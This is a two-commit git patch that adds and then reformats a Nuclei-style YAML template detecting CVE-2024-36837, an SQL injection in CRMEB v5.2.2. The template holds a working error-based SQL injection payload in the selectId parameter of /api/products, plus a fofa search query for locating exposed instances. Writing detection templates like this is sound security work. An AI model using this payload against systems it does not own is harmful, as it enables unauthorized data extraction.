From 40343e764413a1086f851092240b634134d3813d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 11:58:35 +0530 Subject: [PATCH 1/2] Create CVE-2024-36837.yaml --- http/cves/2024/CVE-2024-36837.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36837.yaml diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml new file mode 100644 index 0000000000..07badea610 --- /dev/null +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-36837 + +info: + name: CRMEB v.5.2.2 - SQL Injection + author: DhiyaneshDk + severity: high + description: | + SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file. + reference: + - https://github.com/phtcloud-dev/CVE-2024-36837 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36837 + metadata: + verified: true + max-request: 1 + fofa-query: title="CRMEB" + tags: cve,cve2024,crmeb,sqli + +variables: + num: "{{rand_int(9000000, 9999999)}}" + +http: + - raw: + - | + GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" + - "SQLSTATE" + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 From 5b51116405898fc02c94fa769f3da1d121091a18 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:31:29 +0530 Subject: [PATCH 2/2] Update CVE-2024-36837.yaml --- http/cves/2024/CVE-2024-36837.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 07badea610..14f7ff3d11 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -19,10 +19,9 @@ variables: num: "{{rand_int(9000000, 9999999)}}" http: - - raw: - - | - GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550) HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)" matchers-condition: and matchers: